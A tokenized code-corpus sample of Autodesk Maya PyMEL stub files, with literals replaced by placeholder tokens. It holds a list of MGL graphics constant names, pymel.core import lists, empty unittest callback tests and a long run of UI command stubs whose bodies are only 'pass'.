MGL_WEIGHT_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_ADD = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_BINDING = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_EXT = <NUM_LIT> <EOL> 
MGL_COMBINER_AB_DOT_PRODUCT_NV = <NUM_LIT> <EOL> MGL_NEVER = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT12 = <NUM_LIT> <EOL> MGL_MAX_RENDERBUFFER_SIZE = <NUM_LIT> <EOL> MGL_COMBINER_COMPONENT_USAGE_NV = <NUM_LIT> <EOL> MGL_REG_22_ATI = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_INTERPOLATE = <NUM_LIT> <EOL> MGL_PROGRAM_RESIDENT_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_R_TO_R_SIZE = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> MGL_DEPTH_BIAS = <NUM_LIT> <EOL> MGL_MAX_FRAGMENT_UNIFORM_COMPONENTS_ARB = <NUM_LIT> <EOL> kMGLext_MGLX_create_pbuffer_sgix = <NUM_LIT> <EOL> MGL_COMBINER_INPUT_NV = <NUM_LIT> <EOL> MGL_INTENSITY = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_PASS_THROUGH_TOKEN = <NUM_LIT> <EOL> MGL_FRAGMENT_SHADER_ARB = <NUM_LIT> <EOL> MGL_NORMAL_MAP_ARB = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_B_SIZE = <NUM_LIT> <EOL> MGL_MAX_OPTIMIZED_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_OPERAND2_ALPHA = <NUM_LIT> <EOL> MGL_SCALE_BY_ONE_HALF_NV = <NUM_LIT> <EOL> MGL_FRAGMENT_DEPTH_EXT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_LOCALS_EXT = <NUM_LIT> <EOL> MGL_STENCIL_BUFFER_BIT = <NUM_LIT> <EOL> MGL_OPERAND1_ALPHA = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_1D = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_R_SIZE = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA32F = <NUM_LIT> <EOL> MGL_OPERAND0_ALPHA = <NUM_LIT> <EOL> kMGLext_NV_float_buffer = <NUM_LIT> <EOL> MGL_PIXEL_MAP_S_TO_S_SIZE = <NUM_LIT> <EOL> MGL_COMPRESSED_INTENSITY = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_INVARIANTS_EXT = <NUM_LIT> <EOL> kMGLext_NUMBER_OF_EXTENSIONS = <NUM_LIT> <EOL> MGL_OPERAND2_RGB = <NUM_LIT> <EOL> MGL_TEXTURE_2D = <NUM_LIT> <EOL> MGL_SIGNED_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_VARIANTS_EXT = <NUM_LIT> <EOL> MGL_DEPTH_SCALE = <NUM_LIT> <EOL> MGL_OPERAND1_RGB = <NUM_LIT> <EOL> MGL_SIGNED_IDENTITY_NV = <NUM_LIT> <EOL> MGL_FLOAT_RG16_NV = 
<NUM_LIT> <EOL> MGL_MAP2_VERTEX_4 = <NUM_LIT> <EOL> MGL_OPERAND0_RGB = <NUM_LIT> <EOL> MGL_CON_14_ATI = <NUM_LIT> <EOL> MGL_HALF_BIAS_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_3 = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSION_HINT_ARB = <NUM_LIT> <EOL> kMGLext_texture_compression = <NUM_LIT:10> <EOL> MGL_SOURCE2_ALPHA = <NUM_LIT> <EOL> MGL_HALF_BIAS_NORMAL_NV = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_EXT = <NUM_LIT> <EOL> MGL_SOURCE1_ALPHA = <NUM_LIT> <EOL> MGL_EXPAND_NEGATE_NV = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_3 = <NUM_LIT> <EOL> MGL_LUMINANCE32F = <NUM_LIT> <EOL> MGL_SOURCE0_ALPHA = <NUM_LIT> <EOL> MGL_EXPAND_NORMAL_NV = <NUM_LIT> <EOL> MGL_REG_20_ATI = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_2 = <NUM_LIT> <EOL> MGL_TEXTURE_1D = <NUM_LIT> <EOL> MGL_UNSIGNED_INVERT_NV = <NUM_LIT> <EOL> MGL_MAP2_TEXTURE_COORD_1 = <NUM_LIT> <EOL> MGL_MATRIX16 = <NUM_LIT> <EOL> MGL_MAX_FRAGMENT_PROGRAM_LOCAL_PARAMETERS_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_SOURCE1_RGB = <NUM_LIT> <EOL> MGL_UNSIGNED_IDENTITY_NV = <NUM_LIT> <EOL> MGL_FLOAT_R32_NV = <NUM_LIT> <EOL> MGL_MAP2_NORMAL = <NUM_LIT> <EOL> MGL_SOURCE0_RGB = <NUM_LIT> <EOL> MGL_INCR_WRAP_EXT = <NUM_LIT> <EOL> MGL_SPARE0_PLUS_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_SCALAR_EXT = <NUM_LIT> <EOL> MGL_DST_COLOR = <NUM_LIT> <EOL> MGL_COMBINE_ALPHA = <NUM_LIT> <EOL> MGL_E_TIMES_F_NV = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_SIZE_NV = <NUM_LIT> <EOL> MGL_ONE_MINUS_SRC_COLOR = <NUM_LIT> <EOL> MGL_COMBINE_RGB = <NUM_LIT> <EOL> MGL_DISCARD_NV = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_4 = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT9 = <NUM_LIT> <EOL> MGL_COMBINE = <NUM_LIT> <EOL> MGL_SPARE1_NV = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD19_EXT = <NUM_LIT> <EOL> MGL_MAP1_VERTEX_3 = <NUM_LIT> <EOL> MGL_REG_30_ATI = <NUM_LIT> <EOL> MGL_TEXTURE10 = <NUM_LIT> <EOL> MGL_SPARE0_NV = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_4 = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT24_ARB = <NUM_LIT> 
<EOL> MGL_CLAMP_TO_BORDER = <NUM_LIT> <EOL> MGL_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_FLOAT_R16_NV = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_3 = <NUM_LIT> <EOL> MGL_MAP2_COLOR_4 = <NUM_LIT> <EOL> kMGLext_blend_color = <NUM_LIT> <EOL> MGL_COMPRESSED_TEXTURE_FORMATS = <NUM_LIT> <EOL> MGL_CLIENT_ALL_ATTRIB_BITS = - <NUM_LIT:1> <EOL> MGL_VARIABLE_D_NV = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR_NV = <NUM_LIT> <EOL> MGL_TEXTURE_STACK_DEPTH = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_2 = <NUM_LIT> <EOL> MGL_DRAW_PIXEL_TOKEN = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR1_NV = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MAP1_TEXTURE_COORD_1 = <NUM_LIT> <EOL> MGL_REG_26_ATI = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR0_NV = <NUM_LIT> <EOL> MGL_MAP1_NORMAL = <NUM_LIT> <EOL> MGL_ALPHA32F = <NUM_LIT> <EOL> MGL_BITMAP = <NUM_LIT> <EOL> MGL_POLYGON_TOKEN = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSION_HINT = <NUM_LIT> <EOL> MGL_3D = <NUM_LIT> <EOL> MGL_MAP1_INDEX = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_REG_24_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_NV = <NUM_LIT> <EOL> MGL_VARIABLE_F_NV = <NUM_LIT> <EOL> MGL_MAP1_COLOR_4 = <NUM_LIT> <EOL> MGL_MATRIX14 = <NUM_LIT> <EOL> MGL_CON_4_ATI = <NUM_LIT> <EOL> MGL_POINT_TOKEN = <NUM_LIT> <EOL> MGL_REFLECTION_MAP = <NUM_LIT> <EOL> MGL_NOTEQUAL = <NUM_LIT> <EOL> MGL_FLOAT_RGBA_NV = <NUM_LIT> <EOL> MGL_3D_COLOR = <NUM_LIT> <EOL> MGL_OP_MOV_EXT = <NUM_LIT> <EOL> MGL_AUTO_NORMAL = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB = <NUM_LIT> <EOL> MGL_DOT3_RGBA_ARB = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY6_NV = <NUM_LIT> <EOL> MGL_CLIP_PLANE3 = <NUM_LIT> <EOL> MGL_ONE_MINUS_SRC_ALPHA = <NUM_LIT> <EOL> MGL_NAME_STACK_DEPTH = <NUM_LIT> <EOL> MGL_REG_21_ATI = <NUM_LIT> <EOL> MGL_READ_ONLY_ARB = <NUM_LIT> <EOL> MGL_RIGHT = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT3_EXT = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_STRIDE_NV = <NUM_LIT> <EOL> MGL_MAD_ATI = <NUM_LIT> <EOL> MGL_3D_COLOR_TEXTURE = <NUM_LIT> <EOL> 
MGL_CON_0_ATI = <NUM_LIT> <EOL> MGL_UNPACK_IMAGE_HEIGHT_EXT = <NUM_LIT> <EOL> MGL_FOG_END = <NUM_LIT> <EOL> MGL_ACCUM_BLUE_BITS = <NUM_LIT> <EOL> MGL_COLOR_ATTACHMENT7 = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE = <NUM_LIT> <EOL> MGL_DRAW_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_REG_17_ATI = <NUM_LIT> <EOL> MGL_ACCUM_GREEN_BITS = <NUM_LIT> <EOL> MGL_REG_18_ATI = <NUM_LIT> <EOL> MGL_TEXTURE8 = <NUM_LIT> <EOL> MGL_READ_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_ACCUM_RED_BITS = <NUM_LIT> <EOL> MGL_POINT_DISTANCE_ATTENUATION_ARB = <NUM_LIT> <EOL> MGL_NAND = <NUM_LIT> <EOL> MGL_MAX_CUBE_MAP_TEXTURE_SIZE = <NUM_LIT> <EOL> kMGLext_MGLX_destroy_pbuffer = <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import pymel . core . context as context <EOL> import maya <EOL> import pymel . core . rendering as rendering <EOL> import maya . cmds as cmds <EOL> import pymel . util as util <EOL> import pymel . core . runtime as runtime <EOL> import pymel . api as api <EOL> import pymel . core . system as system <EOL> import pymel . core . uitypes as ui <EOL> import pymel . core . uitypes as uitypes <EOL> import pymel . core . nodetypes as nodetypes <EOL> import pymel . core . nodetypes as nt <EOL> import pymel . core . animation as animation <EOL> import pymel . core . datatypes as dt <EOL> import pymel . core . language as language <EOL> import pymel . core . windows as windows <EOL> import pymel . core . modeling as modeling <EOL> import pymel . core . effects as effects <EOL> from pymel . core . general import * <EOL> from pymel . core . system import * <EOL> from pymel . core . windows import * <EOL> from pymel . core . animation import * <EOL> from pymel . core . context import * <EOL> from pymel . core . modeling import * <EOL> from pymel . core . other import * <EOL> from pymel . core . rendering import * <EOL> from pymel . core . effects import * <EOL> from pymel . core . language import Env <EOL> from pymel . core . language import callbacks <EOL> from pymel . core . language import MelConversionError <EOL> from pymel . core . language import MelError <EOL> from pymel . core . language import Mel <EOL> from pymel . core . language import evalNoSelectNotify <EOL> from pymel . core . language import Catch <EOL> from pymel . core . language import getProcArguments <EOL> from pymel . core . language import pythonToMel <EOL> from pymel . core . language import stackTrace <EOL> from pymel . core . language import resourceManager <EOL> from pymel . core . language import isValidMelType <EOL> from pymel . core . language import getMelType <EOL> from pymel . core . language import conditionExists <EOL> from pymel . core . 
language import OptionVarList <EOL> from pymel . core . language import MelUnknownProcedureError <EOL> from pymel . core . language import getLastError <EOL> from pymel . core . language import MelArgumentError <EOL> from pymel . core . language import evalEcho <EOL> from pymel . core . language import getMelGlobal <EOL> from pymel . core . language import OptionVarDict <EOL> from pymel . core . language import MelGlobals <EOL> from pymel . core . language import scriptJob <EOL> from pymel . core . language import python <EOL> from pymel . core . language import pythonToMelCmd <EOL> from pymel . core . language import MelSyntaxError <EOL> from pymel . core . language import setMelGlobal <EOL> from pymel . core . language import waitCursor <EOL> def updateSoftBodyUI ( nodeName ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> MELTYPES = [ ] <EOL> optionVar = { } <EOL> catch = None <EOL> env = None <EOL> logger = None </s>
<s> import maya . OpenMaya as OpenMaya <EOL> import maya . cmds as cmds <EOL> import sys <EOL> import maya . OpenMayaMPx as OpenMayaMPx <EOL> import unittest <EOL> class testCallbackStrings ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testFileNewCheckCallback ( self ) : <EOL> pass <EOL> def testFileNewCheckCallbackAllow ( self ) : <EOL> pass <EOL> def testFileNewCheckCallbackStop ( self ) : <EOL> pass <EOL> def testFileOpenFileqCheckCallback ( self ) : <EOL> pass <EOL> def testBeforeOpenFileCheckCallback ( retCode , fileObject , clientData ) : <EOL> pass <EOL> def testBeforeNewCheckCallback ( retCode , clientData ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def testBeforeNewCheckCallbackStop ( retCode , clientData ) : <EOL> pass <EOL> def testBeforeNewCheckCallbackAllow ( retCode , clientData ) : <EOL> pass <EOL> gCallbackName = None </s>
<s> import exceptions <EOL> import pymel . internal . pmcmds as cmds <EOL> import traceback <EOL> import pymel . versions as _versions <EOL> import re <EOL> import pymel . internal as _internal <EOL> import pymel . util as _util <EOL> import functools <EOL> import pymel . internal . factories as _factories <EOL> import sys <EOL> from pymel . internal . factories import CallbackWithArgs <EOL> from pymel . core . uitypes import toQtLayout <EOL> from pymel . core . uitypes import toQtWindow <EOL> from pymel . internal . factories import Callback <EOL> from pymel . core . system import Path as _Path <EOL> from pymel . core . uitypes import toQtObject <EOL> from pymel . core . uitypes import objectTypeUI <EOL> from pymel . core . uitypes import toQtControl <EOL> from pymel . core . uitypes import toQtMenuItem <EOL> class PopupError ( exceptions . Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , msg , * args , ** kwargs ) : <EOL> pass <EOL> def __new__ ( cls , msgOrException , title = '<STR_LIT>' , button = '<STR_LIT>' , msg = None , icon = '<STR_LIT>' ) : <EOL> pass <EOL> __weakref__ = None <EOL> def dynPaintEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def refreshEditorTemplates ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperGraph ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def messageLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrFieldSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def commandLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nameCommand ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setStartupMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuSetPref ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def webBrowser ( * args , ** kwargs ) : <EOL> 
"""<STR_LIT>""" <EOL> pass <EOL> def intField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def editorTemplate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def confirmDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextRadioButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def progressBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toggleWindowVisibility ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def overrideModifier ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def uiTemplate ( name = None , force = False , exists = None ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def modelPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def loadPrefObjects ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nameField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intScrollBar ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def modelEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _lsUI ( ** kwargs ) : <EOL> pass <EOL> def textFieldButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def separator ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hyperShade ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rowLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def clipEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatFieldGrp ( * args , ** 
kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rowColumnLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textCurves ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptForFolder ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def devicePanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def autoPlace ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfTabLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def animCurveEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hudButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def panel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrColorSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def timePort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdShell ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def palettePort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveShelf ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def formLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hotBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _createClassCommands ( ) : <EOL> pass <EOL> def setNodeTypeFlag ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def defaultLightListCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def linearPrecision ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" 
<EOL> pass <EOL> def iconTextCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def visor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def helpLine ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def subMenuItem ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdScrollFieldReporter ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def defaultNavigation ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scrollLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gradientControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def progressWindow ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def toolCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scriptTable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attributeMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveViewportSettings ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def disable ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def intSlider ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def minimizeApp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def runTimeCommand ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def renameUI ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hotkey ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def swatchDisplayPort ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _findLongName ( name , type = None ) : <EOL> pass <EOL> def flowLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuSet ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptBoxGenerator ( * args , ** kwargs ) : <EOL> 
"""<STR_LIT>""" <EOL> pass <EOL> def iconTextStaticLabel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def animDisplay ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def editor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def treeLister ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gridLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def webBrowserPrefs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cmdScrollFieldExecuter ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def textScrollList ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioMenuItemCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrFieldGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shelfLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setUITemplate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrControlGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorIndexSliderGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def optionMenuGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def keyframeStats ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def text ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def annotate ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuBarLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def valueControlGrp ( name = None , create = False , dataType = None , slider = True , value = None , numberOfControls = <NUM_LIT:1> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def layerButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def gradientControlNoAttr ( * args , ** kwargs ) : <EOL> 
"""<STR_LIT>""" <EOL> pass <EOL> def clipSchedulerOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def frameLayout ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def window ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def currentParent ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getMainProgressBar ( ) : <EOL> pass <EOL> def _createOtherCommands ( ) : <EOL> pass <EOL> def confirmBox ( title , message , yes = '<STR_LIT>' , no = '<STR_LIT>' , * moreButtons , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scmh ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def symbolCheckBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setMenuMode ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def renderWindowEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def panelHistory ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def componentEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nodeIconButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def promptForPath ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def scrollField ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def attrEnumOptionMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fontDialog ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dockControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def soundControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def picture ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def hardwareRenderPanel ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def showWindow ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def symbolButton ( * args , ** kwargs ) : <EOL> 
"""<STR_LIT>""" <EOL> pass <EOL> def panelConfiguration ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextRadioCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def menuItem ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def floatSliderButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextScrollList ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def blendShapeEditor ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def keyframeOutliner ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def radioCollection ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def colorSliderButtonGrp ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def channelBox ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def saveMenu ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def inViewMessage ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def iconTextButton ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def rangeControl ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass 